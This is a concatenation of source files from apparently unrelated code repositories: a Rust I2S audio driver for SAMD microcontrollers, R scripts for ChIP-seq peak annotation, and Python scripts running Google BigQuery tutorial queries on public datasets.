pub use pac::dmac::chctrlb::TRIGSRC_A as DmaTriggerSource;
// Haven't verified this path on the samd5x family yet — TODO confirm the register location
#[cfg(any(
feature = "samd51",
feature = "same51",
feature = "same53",
feature = "same54"
))]
pub use pac::dmac::chctrla::TRIGSRC_A as DmaTriggerSource;
pub use pac::i2s::clkctrl::SLOTSIZE_A as BitsPerSlot;
use pac::i2s::serctrl::CLKSEL_A as ClockUnitID;
//////////// This probably belongs in an I2S trait crate? ////////////
/// Errors that I2S operations may produce.
///
/// Derives `Clone`/`Copy`/`PartialEq`/`Eq` so callers can store and compare
/// errors directly (e.g. `matches!`/`assert_eq!` in driver tests).
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum I2SError {
    /// An operation would block because the device is currently busy or there is no data available.
    WouldBlock,
}

/// Result for I2S operations.
pub type Result<T> = core::result::Result<T, I2SError>;
/// Type-level marker for the I2S peripheral's clock unit 0.
pub struct ClockUnit0;
/// Type-level marker for the I2S peripheral's clock unit 1.
pub struct ClockUnit1;

/// Allows compile-time associations between pins and clock units
///
/// Implementors map a marker type (`ClockUnit0`/`ClockUnit1`) to the numeric
/// clock-unit ID used to index the peripheral's per-clock-unit registers
/// (e.g. `clkctrl[ClkUnit::ID as usize]`).
pub trait ClockUnit {
    /// Hardware identifier of the clock unit this marker represents.
    const ID: ClockUnitID;
}

impl ClockUnit for ClockUnit0 {
    const ID: ClockUnitID = ClockUnitID::CLK0;
}

impl ClockUnit for ClockUnit1 {
    const ID: ClockUnitID = ClockUnitID::CLK1;
}
// TODO perhaps have something like this in gpio?
pub struct ExternalClock<PinType> {
frequency: Hertz,
pin: PhantomData<PinType>,
}
/// A source able to drive the master clock of the given clock unit.
///
/// Implemented for the GCLK-derived `I2S0Clock`/`I2S1Clock` HAL types as well
/// as for `ExternalClock` configurations on the MCK-capable pins.
pub trait MasterClock<ClockUnit> {
    /// Frequency of this master clock source.
    fn freq(&self) -> Hertz;
}
// These impls delegate to the inherent `freq()` provided by the HAL clock
// types. Inherent methods take precedence over trait methods during method
// resolution, so `self.freq()` here is NOT self-recursion — though the TODO
// notes this shadowing is confusing and worth tidying.
impl MasterClock<ClockUnit0> for hal::clock::I2S0Clock {
    fn freq(&self) -> Hertz {
        self.freq()
    }
}

impl MasterClock<ClockUnit1> for hal::clock::I2S1Clock {
    fn freq(&self) -> Hertz {
        self.freq()
    }
}

// Externally-supplied master clocks: the pin type parameter constrains which
// clock unit the signal can feed (pin mux function G routes these to I2S).
impl MasterClock<ClockUnit0> for ExternalClock<gpio::Pa9<gpio::PfG>> {
    fn freq(&self) -> Hertz {
        self.frequency
    }
}

#[cfg(any(feature = "min-samd21j"))] // TODO pick min packages for each GPIO pin, also for samd5x
impl MasterClock<ClockUnit0> for ExternalClock<gpio::Pb17<gpio::PfG>> {
    fn freq(&self) -> Hertz {
        self.frequency
    }
}

impl MasterClock<ClockUnit1> for ExternalClock<gpio::Pb10<gpio::PfG>> {
    fn freq(&self) -> Hertz {
        self.frequency
    }
}
/// Marker trait: pins that can carry the serial (bit) clock of a clock unit.
pub trait SerialClock<ClockUnit> {}
impl SerialClock<ClockUnit0> for gpio::Pa10<gpio::PfG> {}
impl SerialClock<ClockUnit1> for gpio::Pb11<gpio::PfG> {}

/// Marker trait: pins that can carry the frame-sync signal of a clock unit.
pub trait FrameSync<ClockUnit> {}
impl FrameSync<ClockUnit0> for gpio::Pa11<gpio::PfG> {}
#[cfg(any(feature = "min-samd21j"))]
impl FrameSync<ClockUnit1> for gpio::Pb12<gpio::PfG> {}
/// The I2S peripheral has two serializers; refer to them using this enum
///
/// The discriminants are used directly as indices into the peripheral's
/// per-serializer register arrays (`serctrl`, `data`), so they are pinned
/// explicitly to 0 and 1.
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum Serializer {
    M0 = 0, // 'm' is the datasheet convention
    M1 = 1,
}
/// The I2S peripheral has two serializers, each can be used as either an input or an output. The
/// SerializerOrientation trait is used to indicate which serializer is used for each direction.
pub trait SerializerOrientation {
    /// Serializer used for transmission in this orientation.
    const TX_ID: Serializer;
    /// Serializer used for reception in this orientation.
    const RX_ID: Serializer;

    // Masks are for the interrupt registers (INTFLAG / INTENSET / INTENCLR),
    // pre-resolved to the bit of the serializer chosen for each direction.
    const RECEIVE_READY_MASK: u16;
    const RECEIVE_OVERRUN_MASK: u16;
    const TRANSMIT_READY_MASK: u16;
    const TRANSMIT_UNDERRUN_MASK: u16;
}
/// Transmit from serializer 0, receive on serializer 1
pub struct Tx0Rx1;
impl SerializerOrientation for Tx0Rx1 {
    const TX_ID: Serializer = Serializer::M0;
    const RX_ID: Serializer = Serializer::M1;

    // Bit positions follow the SAMD21 I2S interrupt register layout:
    // RXRDYn = bit n, RXORn = bit 4+n, TXRDYn = bit 8+n, TXURn = bit 12+n.
    const RECEIVE_READY_MASK: u16 = 1<<1;       // RXRDY1
    const RECEIVE_OVERRUN_MASK: u16 = 1<<5;     // RXOR1
    const TRANSMIT_READY_MASK: u16 = 1<<8;      // TXRDY0
    const TRANSMIT_UNDERRUN_MASK: u16 = 1<<12;  // TXUR0
}

/// Transmit from serializer 1, receive on serializer 0
pub struct Tx1Rx0;
impl SerializerOrientation for Tx1Rx0 {
    const TX_ID: Serializer = Serializer::M1;
    const RX_ID: Serializer = Serializer::M0;

    const RECEIVE_READY_MASK: u16 = 1<<0;       // RXRDY0
    const RECEIVE_OVERRUN_MASK: u16 = 1<<4;     // RXOR0
    const TRANSMIT_READY_MASK: u16 = 1<<9;      // TXRDY1
    const TRANSMIT_UNDERRUN_MASK: u16 = 1<<13;  // TXUR1
}
// TODO make these optional, in particular the Tx one to support PDM mics
/// Marker trait: pins usable as the data-out line for a serializer orientation.
pub trait SerializerTx<SerializerOrientation> {}
impl SerializerTx<Tx0Rx1> for gpio::Pa7<gpio::PfG> {}
impl SerializerTx<Tx1Rx0> for gpio::Pa8<gpio::PfG> {}
impl SerializerTx<Tx0Rx1> for gpio::Pa19<gpio::PfG> {}
#[cfg(any(feature = "min-samd21j"))]
impl SerializerTx<Tx1Rx0> for gpio::Pb16<gpio::PfG> {}

/// Marker trait: pins usable as the data-in line for a serializer orientation.
///
/// Note each physical pin maps to the opposite orientation compared to its
/// `SerializerTx` impl: a pin wired to serializer 0 transmits under `Tx0Rx1`
/// but receives under `Tx1Rx0`.
pub trait SerializerRx<SerializerOrientation> {}
impl SerializerRx<Tx1Rx0> for gpio::Pa7<gpio::PfG> {}
impl SerializerRx<Tx0Rx1> for gpio::Pa8<gpio::PfG> {}
impl SerializerRx<Tx1Rx0> for gpio::Pa19<gpio::PfG> {}
#[cfg(any(feature = "min-samd21j"))]
impl SerializerRx<Tx0Rx1> for gpio::Pb16<gpio::PfG> {}
/// A snapshot of the I2S interrupt flag register, interpreted through a
/// serializer orientation `T` so callers can query per-direction flags
/// without knowing which physical serializer handles each direction.
pub struct InterruptMask<T> {
    // Raw INTFLAG bits as read from the peripheral.
    mask: u16,
    phantom: PhantomData<T>,
}

impl <T> From<u16> for InterruptMask<T> {
    fn from(mask: u16) -> InterruptMask<T> {
        InterruptMask {
            mask,
            phantom: PhantomData
        }
    }
}
impl <T: SerializerOrientation> InterruptMask<T> {
    /// True when the receive serializer has a word ready to be read.
    pub fn receive_ready(&self) -> bool {
        self.mask & T::RECEIVE_READY_MASK != 0
    }

    /// True when received data was lost because the previous word had not
    /// been read yet (receive overrun).
    pub fn receive_overrun(&self) -> bool {
        self.mask & T::RECEIVE_OVERRUN_MASK != 0
    }

    /// Misspelled alias of [`Self::receive_overrun`], kept so existing
    /// callers keep compiling.
    #[deprecated(note = "use `receive_overrun` instead")]
    pub fn receive_overrrun(&self) -> bool {
        self.receive_overrun()
    }

    /// True when the transmit serializer can accept another word.
    pub fn transmit_ready(&self) -> bool {
        self.mask & T::TRANSMIT_READY_MASK != 0
    }

    /// True when the transmitter ran out of data (transmit underrun).
    pub fn transmit_underrun(&self) -> bool {
        self.mask & T::TRANSMIT_UNDERRUN_MASK != 0
    }
}
/// DMA "buffer" that is really a single fixed peripheral register address
/// (intended for the I2S DATA register): length 1 and non-incrementing, so
/// the DMA engine reads/writes the same address for every beat.
#[derive(Clone, Copy)]
pub struct I2sDmaBuffer(*mut u32);

// Safety: the wrapped pointer must be a valid, DMA-accessible u32 register
// address for as long as a transfer uses it — the caller constructing the
// I2sDmaBuffer is responsible for that (NOTE(review): not enforced here).
unsafe impl Buffer for I2sDmaBuffer {
    type Beat = u32;

    fn dma_ptr(&mut self) -> *mut Self::Beat {
        self.0
    }

    // The address is a hardware register, so the DMA must not increment it.
    fn incrementing(&self) -> bool {
        false
    }

    // One beat per descriptor: a single 32-bit register.
    fn buffer_len(&self) -> usize {
        1
    }
}
/// Driver for the I2S peripheral.
///
/// Owns the peripheral plus every pin it was configured with, so nothing can
/// be reused while the driver is alive; `free()` returns them all.
pub struct I2s<MasterClockSource, SerialClockPin, FrameSyncPin, RxPin, TxPin> {
    hw: pac::I2S,
    serial_clock_pin: SerialClockPin,
    frame_sync_pin: FrameSyncPin,
    data_in_pin: RxPin,
    data_out_pin: TxPin,
    master_clock_source: MasterClockSource,
}
// Need to support three clocking configurations:
//     GCLK master clock (frequency) => serial clock is output (pin+frequency)
// external master clock (pin+frequency) => serial clock is output (pin+frequency)
// No master clock => serial clock is input (pin)
impl<MasterClockSource, SerialClockPin, FrameSyncPin, RxPin, TxPin>
I2s<MasterClockSource, SerialClockPin, FrameSyncPin, RxPin, TxPin> {
    /// Configures the peripheral as a TDM bus master, deriving the serial
    /// clock from `master_clock_source` divided down to `serial_freq`.
    ///
    /// master_clock_source, serial_clock_pin, and frame_sync_pin must be attached to the same clock unit
    /// TxPin and RxPin need to be connected to different serializer units
    ///
    /// The peripheral is left configured but NOT enabled — call [`I2s::enable`]
    /// afterwards (register writes only synchronize once enabled).
    pub fn tdm_master<ClkUnit: ClockUnit, SerializerCfg: SerializerOrientation, Freq: Into<Hertz>>(
        hw: pac::I2S,
        pm: &mut hal::target_device::PM,
        master_clock_source: MasterClockSource,
        serial_freq: Freq,
        number_of_slots: u8,
        bits_per_slot: BitsPerSlot,
        serial_clock_pin: SerialClockPin,
        frame_sync_pin: FrameSyncPin,
        data_in_pin: RxPin,
        data_out_pin: TxPin,
    ) -> Self
    where
        MasterClockSource: MasterClock<ClkUnit>,
        SerialClockPin: SerialClock<ClkUnit>,
        FrameSyncPin: FrameSync<ClkUnit>,
        RxPin: SerializerRx<SerializerCfg>,
        TxPin: SerializerTx<SerializerCfg>,
    {
        // Turn on the APB clock to the I2S peripheral
        pm.apbcmask.modify(|_, w| w.i2s_().set_bit());

        Self::reset(&hw);

        defmt::info!("Master clock running at {:?}", master_clock_source.freq().0);
        // NOTE(review): if master freq < serial freq this subtraction wraps in
        // release builds, and a ratio > 256 truncates in the `as u8` cast; the
        // TODO list already calls for warning on uneven division — confirm.
        let master_clock_divisor = (master_clock_source.freq().0 / serial_freq.into().0 - 1) as u8;
        defmt::info!("divisor is {:?}", master_clock_divisor);

        // Configure the chosen clock unit's frame/slot geometry.
        // unsafe is due to the bits() calls
        unsafe {
            hw.clkctrl[ClkUnit::ID as usize].write(|w|
                w
                    .mckdiv().bits(master_clock_divisor)
                    // .mcksel().mckpin() // Use MCK pin as master clock input
                    // .scksel().sckpin() // Uses SCK pin as input
                    .sckoutinv().set_bit() // Invert serial clock
                    .bitdelay().i2s() // 1-bit delay between fsync and data
                    .fswidth().bit_() // frame sync is one bit wide
                    .nbslots().bits(number_of_slots - 1) // register holds slots-1
                    .slotsize().variant(bits_per_slot)
            );
        }

        // Attach both serializers to this clock unit; the TX one also gets
        // its direction flipped to transmit (serializers default to receive).
        hw.serctrl[SerializerCfg::RX_ID as usize].write(|w| w.clksel().variant(ClkUnit::ID));
        hw.serctrl[SerializerCfg::TX_ID as usize].write(|w| w.clksel().variant(ClkUnit::ID).sermode().tx());

        // Synchronization doesn't seem to happen until the peripheral is enabled
        match ClkUnit::ID {
            ClockUnitID::CLK0 => {
                hw.ctrla.modify(|_, w| w.cken0().set_bit());
            }

            ClockUnitID::CLK1 => {
                hw.ctrla.modify(|_, w| w.cken1().set_bit());
            }
        }

        hw.ctrla
            .modify(|_, w| w.seren0().set_bit().seren1().set_bit());

        Self {
            hw,
            serial_clock_pin,
            frame_sync_pin,
            data_in_pin,
            data_out_pin,
            master_clock_source,
        }
    }
    /// Writes one word to the transmit serializer.
    ///
    /// Returns `Err(I2SError::WouldBlock)` when the transmit-ready flag for
    /// the configured TX serializer is clear (previous word not yet consumed).
    /// On success, writes the DATA register and busy-waits until the write
    /// has synchronized into the I2S clock domain (SYNCBUSY.DATAn clears).
    pub fn send<SerializerCfg: SerializerOrientation>(&self, v: u32) -> Result<()>
    where
        RxPin: SerializerRx<SerializerCfg>,
        TxPin: SerializerTx<SerializerCfg>,
    {
        // The two arms are identical apart from the serializer index; the PAC
        // exposes per-index flag accessors, hence the duplication.
        match SerializerCfg::TX_ID {
            Serializer::M0 => {
                if self.hw.intflag.read().txrdy0().bit_is_clear() {
                    return Err(I2SError::WouldBlock);
                }

                // unsafe: raw bits() write of the sample word
                unsafe {
                    self.hw.data[0].write(|reg| reg.data().bits(v));
                }

                while self.hw.syncbusy.read().data0().bit_is_set() {}
            }

            Serializer::M1 => {
                if self.hw.intflag.read().txrdy1().bit_is_clear() {
                    return Err(I2SError::WouldBlock);
                }

                unsafe {
                    self.hw.data[1].write(|reg| reg.data().bits(v));
                }

                while self.hw.syncbusy.read().data1().bit_is_set() {}
            }
        }

        Ok(())
    }
/// Gives the peripheral and pins back.
///
/// Consumes the driver and returns, in order: the raw `pac::I2S`
/// peripheral, the serial clock pin, the frame-sync pin, the RX data pin,
/// the TX data pin, and the master clock source, so they can be reused
/// or reconfigured by the caller.
pub fn free(
    self,
) -> (
    pac::I2S,
    SerialClockPin,
    FrameSyncPin,
    RxPin,
    TxPin,
    MasterClockSource,
) {
    (
        self.hw,
        self.serial_clock_pin,
        self.frame_sync_pin,
        self.data_in_pin,
        self.data_out_pin,
        self.master_clock_source,
    )
}
/// Blocking software reset of the peripheral.
///
/// Sets CTRLA.SWRST and spins until both the SYNCBUSY.SWRST and the
/// CTRLA.SWRST bits read back as clear, i.e. until the reset has fully
/// propagated through the peripheral's clock domain.
fn reset(hw: &pac::I2S) {
    hw.ctrla.write(|w| w.swrst().set_bit());
    while hw.syncbusy.read().swrst().bit_is_set() || hw.ctrla.read().swrst().bit_is_set() {}
}
/// Enable the peripheral.
///
/// Sets CTRLA.ENABLE, then blocks until all of the clock-unit enable,
/// serializer enable, and ENABLE sync-busy flags have cleared, so the
/// peripheral is fully synchronized before the caller proceeds.
pub fn enable(&self) {
    self.hw.ctrla.modify(|_, w| w.enable().set_bit());
    while self.hw.syncbusy.read().cken0().bit_is_set()
        || self.hw.syncbusy.read().cken1().bit_is_set()
        || self.hw.syncbusy.read().seren0().bit_is_set()
        || self.hw.syncbusy.read().seren1().bit_is_set()
        || self.hw.syncbusy.read().enable().bit_is_set()
    {}
}
/// Enables the receive-ready interrupt for the RX serializer selected by
/// `SerializerCfg`, by writing its RECEIVE_READY_MASK into INTENSET.
pub fn enable_receive_ready_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    // unsafe is due to the raw bits() write.
    unsafe {
        self.hw.intenset.write(|w| {
            w.bits(SerializerCfg::RECEIVE_READY_MASK)
        });
    }
}
/// Enables the receive-overrun interrupt for the RX serializer selected by
/// `SerializerCfg`, by writing its RECEIVE_OVERRUN_MASK into INTENSET.
pub fn enable_receive_overrun_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    // unsafe is due to the raw bits() write.
    unsafe {
        self.hw.intenset.write(|w| {
            w.bits(SerializerCfg::RECEIVE_OVERRUN_MASK)
        });
    }
}
/// Enables the transmit-ready interrupt for the TX serializer selected by
/// `SerializerCfg`, by writing its TRANSMIT_READY_MASK into INTENSET.
pub fn enable_transmit_ready_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    // unsafe is due to the raw bits() write.
    unsafe {
        self.hw.intenset.write(|w| {
            w.bits(SerializerCfg::TRANSMIT_READY_MASK)
        });
    }
}
/// Enables the transmit-underrun interrupt for the TX serializer selected
/// by `SerializerCfg`, by writing its TRANSMIT_UNDERRUN_MASK into INTENSET.
pub fn enable_transmit_underrun_interrupt<SerializerCfg: SerializerOrientation>(&self)
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    // unsafe is due to the raw bits() write.
    unsafe {
        self.hw.intenset.write(|w| {
            w.bits(SerializerCfg::TRANSMIT_UNDERRUN_MASK)
        });
    }
}
/// Reads the pending interrupt flags and acknowledges them, returning the
/// flags that were set wrapped in an `InterruptMask`.
///
/// NOTE(review): the read value is written straight back to INTFLAG to
/// clear the flags — presumably the register is write-1-to-clear; confirm
/// against the device datasheet.
pub fn get_and_clear_interrupts<SerializerCfg: SerializerOrientation>(&self) -> InterruptMask<SerializerCfg>
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    // Snapshot the raw flag bits before acknowledging them.
    let ints = self.hw.intflag.read().bits();
    // unsafe is due to the raw bits() write.
    unsafe {
        self.hw.intflag.write(|w| {
            w.bits(ints)
        });
    }
    InterruptMask::from(ints)
}
/// Returns the DMA destination address for transmission: a raw pointer to
/// the DATA register of the TX serializer selected by `SerializerCfg`,
/// wrapped in an `I2sDmaBuffer`.
pub fn transmit_dma_buffer<SerializerCfg: SerializerOrientation>(&self) -> I2sDmaBuffer
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    // Cast the register reference to a mutable raw u32 pointer for DMA use.
    I2sDmaBuffer(
        &self.hw.data[SerializerCfg::TX_ID as usize] as *const _ as *mut u32
    )
}
/// Returns the DMA trigger source corresponding to the TX serializer
/// selected by `SerializerCfg` (I2S_TX_0 for M0, I2S_TX_1 for M1).
pub fn transmit_dma_trigger<SerializerCfg: SerializerOrientation>(&self) -> DmaTriggerSource
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    match SerializerCfg::TX_ID {
        Serializer::M0 => DmaTriggerSource::I2S_TX_0,
        Serializer::M1 => DmaTriggerSource::I2S_TX_1,
    }
}
/// Returns the DMA source address for reception: a raw pointer to the
/// DATA register of the RX serializer selected by `SerializerCfg`,
/// wrapped in an `I2sDmaBuffer`.
pub fn receive_dma_buffer<SerializerCfg: SerializerOrientation>(&self) -> I2sDmaBuffer
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    // Cast the register reference to a mutable raw u32 pointer for DMA use.
    I2sDmaBuffer(
        &self.hw.data[SerializerCfg::RX_ID as usize] as *const _ as *mut u32
    )
}
/// Returns the DMA trigger source corresponding to the RX serializer
/// selected by `SerializerCfg` (I2S_RX_0 for M0, I2S_RX_1 for M1).
pub fn receive_dma_trigger<SerializerCfg: SerializerOrientation>(&self) -> DmaTriggerSource
where
    RxPin: SerializerRx<SerializerCfg>,
    TxPin: SerializerTx<SerializerCfg>,
{
    match SerializerCfg::RX_ID {
        Serializer::M0 => DmaTriggerSource::I2S_RX_0,
        Serializer::M1 => DmaTriggerSource::I2S_RX_1,
    }
}
}
| dad8167e3772f2630c176993c20b9a5e0664e102 | [
"TOML",
"Rust",
"Text",
"Markdown"
] | 4 | Text | ianrrees/samd-i2s | 4d74588d3f06175a778cf221b24d20474bfe03f5 | 532a7b5a42908402820dd8349e9d4fd5a6900d0b |
refs/heads/main | <file_sep>#source('lib.R')
library(ggplot2)
library(dplyr)
###
#NAME <- '/H3K36me3_H1.intersect_w_DeepZ'
#NAME <- '/DeepZ'
#NAME <- '/H3K36me3_H1.ENCFF295UVV.hg19'
#NAME <- '/H3K36me3_H1.ENCFF327EZJ.hg19'
getwd()
###
setwd("C:/Users/Ilya_Pakhalko/Documents/BioProject")
bed_df <- read.delim(paste0(DATA_DIR, NAME, '.bed'), as.is = TRUE, header = FALSE)
#colnames(bed_df) <- c('chrom', 'start', 'end', 'name', 'score')
colnames(bed_df) <- c('chrom', 'start', 'end')
bed_df$len <- bed_df$end - bed_df$start
ggplot(bed_df) +
aes(x = len) +
geom_histogram() +
ggtitle(NAME, subtitle = sprintf('Number of peaks = %s', nrow(bed_df))) +
theme_bw()
ggsave(paste0('len_hist.', NAME, '.pdf'), path = OUT_DIR)<file_sep># hse21_H3K36me3_ZDNA_human
Отчёт можно найти в корневой папке репозитория либо почитать по ссылке: https://docs.google.com/document/d/1kyM7NmsIqCi_P6IENprY7LOAD7JMK1S4PklL5Fd8xTw/edit?usp=sharing
<file_sep>###
if (!requireNamespace("BiocManager", quietly = TRUE))
install.packages("BiocManager")
BiocManager::install("TxDb.Hsapiens.UCSC.hg19.knownGene", force=TRUE)
#BiocManager::install("TxDb.Mmusculus.UCSC.mm10.knownGene")
BiocManager::install("ChIPseeker", force=TRUE)
library(ChIPseeker)
library(TxDb.Hsapiens.UCSC.hg19.knownGene)
#library(TxDb.Mmusculus.UCSC.mm10.knownGene)
install.packages("stringi")
BiocManager::install("clusterProfiler", force=TRUE)
library(clusterProfiler)
###
#NAME <- 'H3K36me3_H1.intersect_w_DeepZ'
#NAME <- 'DeepZ'
#NAME <- 'H3K36me3_H1.ENCFF295UVV.hg19.filtered'
#NAME <- 'H3K36me3_H1.ENCFF327EZJ.hg19.filtered'
getwd()
#setwd()
DATA_DIR <- getwd()
BED_FN <- paste0(getwd(), '/',NAME, '.bed')
###
txdb <- TxDb.Hsapiens.UCSC.hg19.knownGene
peak <- readPeakFile(BED_FN)
#install.packages("org.Hs.eg.db")
#BiocManager::install("org.Hs.eg.db", force=TRUE)
#library("org.Hs.eg.db")
peakAnno <- annotatePeak(peak, tssRegion=c(-3000, 3000), TxDb=txdb, annoDb="org.Hs.eg.db")
#pdf(paste0(OUT_DIR, 'chip_seeker.', NAME, '.plotAnnoPie.pdf'))
OUT_DIR <- getwd()
png(paste0(OUT_DIR, '/chip_seeker.', NAME, '.plotAnnoPie.png'))
plotAnnoPie(peakAnno)
dev.off()
# peak <- readPeakFile(BED_FN)
#png(paste0(OUT_DIR, '/chip_seeker.', NAME, '.covplot.png'))
#covplot(peak, weightCol="V5")
#dev.off()
# | 92f41b5b7aac0cebad699db3f685e8a1fd917c32 | [
"Markdown",
"R"
] | 3 | R | ilyaphlk/hse21_H3K36me3_ZDNA_human | 2e186b169e18f93a6b9414bb111e7dcdf7e1597f | 18c6598d20f4c066ea30819f8806d73d9cbf05e1 |
refs/heads/master | <repo_name>shubha-rajan/array_or_hash<file_sep>/README.md
# Array or Hash
How we organize our data matters. Different structuring of data allows for optimizing different algorithms for common methods on the data. Examples of common methods on data include: sorting the data based on a criteria, looking up information for a specific data set, adding data, deleting data etc.
## Exercises
- Consider the example we looked at with the [Student Account Generator exercise](https://github.com/Ada-Developers-Academy/jump-start/blob/master/learning-to-code/arrays/assignments/account-generator.md) There are various different ways to organize this data. Let's scope our attention down to two options. Take some time to consider the pros and cons of these two options:
<ol>
<li> as an Array of hashes </li>
<li> as a Hash of hashes </li>
</ol>
- [Optional] Take some time to understand the [linked code](./array_or_hash.rb) showing student account generator as an array of hashes and as a hash of hashes.
<file_sep>/array_or_hash.rb
# Student account generator data modeled as an array of hashes.
# Each element is one student record; the array preserves insertion order,
# which lets us demonstrate position-based sorting below.
students_data_array = [
  {
    name: "<NAME>",
    id: 123256,
    email: "<EMAIL>"
  },
  {
    name: "<NAME>",
    id: 349222,
    email: "<EMAIL>"
  },
  {
    name: "<NAME>",
    id: 999999,
    email: "<EMAIL>"
  }
]

puts "Here's the student data array:"
puts students_data_array
puts

# Arrays make it easy to order records by a chosen criterion.
# Sort the records alphabetically by first name using selection sort.
puts "Here's the student data array in ascending first name order"

# Selection sort on the :name value: for each position, find the record that
# belongs there and swap it in. Once every position except the last holds the
# right record, the last one is correct by elimination, which is why the loop
# runs (count - 1) times.
(students_data_array.count - 1).times do |position|
  chosen = position # index of the record currently assumed correct here
  # Scan the rest of the array for a record with an earlier name.
  ((position + 1)...students_data_array.count).each do |scan|
    if students_data_array[scan][:name] < students_data_array[chosen][:name]
      chosen = scan
    end
  end
  # Swap only when a better record was found; parallel assignment avoids an
  # explicit temporary variable.
  unless chosen == position
    students_data_array[position], students_data_array[chosen] =
      students_data_array[chosen], students_data_array[position]
  end
end

puts students_data_array
puts "-------------------------------------------------------------------------"
puts

# The same student data modeled as a hash of hashes, keyed by full name.
students_data_hash = {
  "<NAME>" => {
    id: 123256,
    email: "<EMAIL>"
  },
  "<NAME>" => {
    id: 349222,
    email: "<EMAIL>"
  },
  "<NAME>" => {
    id: 999999,
    email: "<EMAIL>"
  }
}

puts "Here's the student data hash"
puts students_data_hash

# Hashes give us direct lookup by key — here, the student's full name.
keep_looking = true
while keep_looking
  print "Enter the full name of the student whose information you'd like to have: "
  requested_name = gets.chomp
  if students_data_hash[requested_name]
    puts "Here's the information for #{requested_name}"
    puts students_data_hash[requested_name]
  else
    puts "Information not found for #{requested_name}"
  end
  puts "Would you like to do another look up? Enter 'y' or 'Y' for yes."
  keep_looking = (gets.chomp.downcase == 'y')
end
| d749c72a2fa33d87fcb3f7217819716fd47577d9 | [
"Markdown",
"Ruby"
] | 2 | Markdown | shubha-rajan/array_or_hash | 69a9f9e3c15b6d4ad1f17705e0a5dbf501bce2b1 | ca93b182da0f5a6cda44fc57b1e6b4e05995b66c |
refs/heads/master | <file_sep># Objective
Looking for ways to refresh my SQL skills, I stumbled upon a Kaggle online course that teaches how to use Google BigQuery. It's a nice and fun way to learn about a new tool! This led me to enroll in the Kaggle SQL summer camp: I can't wait to learn new stuff.
In the meantime, I've gathered the templates for later use of BigQuery commands.
# Contents
Bigquery programs to run basic SQL commands based on a Kaggle tutorial.
# Using GoogleCloudPlatform
You have to have the bigquery library installed from Google Cloud. Then make sure you're authenticated on Google Cloud Platform. See https://cloud.google.com/bigquery/docs/reference/libraries#client-libraries-install-python for more info.
# Source of data
Kaggle's introduction to SQL for working with databases, using Google BigQuery to scale to massive datasets.
https://www.kaggle.com/learn/intro-to-sql
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object
client = bigquery.Client()
# Construct a reference to the "nhtsa_traffic_fatalities" dataset
dataset_ref = client.dataset("nhtsa_traffic_fatalities", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "accident_2015" table
table_ref = dataset_ref.table("accident_2015")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "accident_2015" table in the "nhtsa_traffic_fatalities" dataset
table.schema
# Print information on all the columns in the "accident_2015" table in the "nhtsa_traffic_fatalities" dataset
client.list_rows(table, max_results = 5).to_dataframe()
# query
# Query to find out the number of accidents for each day of the week
query = """
SELECT COUNT(consecutive_number) AS num_accidents,
EXTRACT(DAYOFWEEK FROM timestamp_of_crash) AS day_of_week
FROM `bigquery-public-data.nhtsa_traffic_fatalities.accident_2015`
GROUP BY day_of_week
ORDER BY num_accidents DESC
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
query_job = client.query(query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
accidents_by_day = query_job.to_dataframe()
# Print the DataFrame
accidents_by_day
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "crypto_bitcoin" dataset
dataset_ref = client.dataset("crypto_bitcoin", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# Construct a reference to the "transactions" table
table_ref = dataset_ref.table("transactions")
# API request - fetch the table
table = client.get_table(table_ref)
# Preview the first five lines of the "transactions" table
transactions = client.list_rows(table, max_results=5).to_dataframe()
# Query to select the number of transactions per date, sorted by date
query_with_CTE = """
WITH time AS
(SELECT DATE(block_timestamp) AS trans_date
FROM `bigquery-public-data.crypto_bitcoin.transactions`
)
SELECT COUNT(1) AS num_transactions,
trans_date
FROM time
GROUP BY trans_date
ORDER BY trans_date
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
query_job = client.query(query_with_CTE, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
transactions_by_date = query_job.to_dataframe()
# Print the first five rows
transactions_by_date.head()
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object
client = bigquery.Client()
### --------------------------------------------------------------------------
### SELECT FROM
### --------------------------------------------------------------------------
# Construct a reference to the "openaq" dataset
dataset_ref = client.dataset("openaq", project="bigquery-public-data")
# https://openaq.org/#/?_k=esd1sb
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "global_air_quality" table
table_ref = dataset_ref.table("global_air_quality")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "global_air_quality" table in the "openaq" dataset
table.schema
# Print information on all the columns in the "global_air_quality" table in the "openaq" dataset
full = client.list_rows(table, max_results = 5).to_dataframe()
full.info()
# query
query = """
SELECT city
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'US'
"""
# Set up the query
query_job = client.query(query)
# API request - run the query, and return a pandas DataFrame
us_cities = query_job.to_dataframe()
# What five cities have the most measurements?
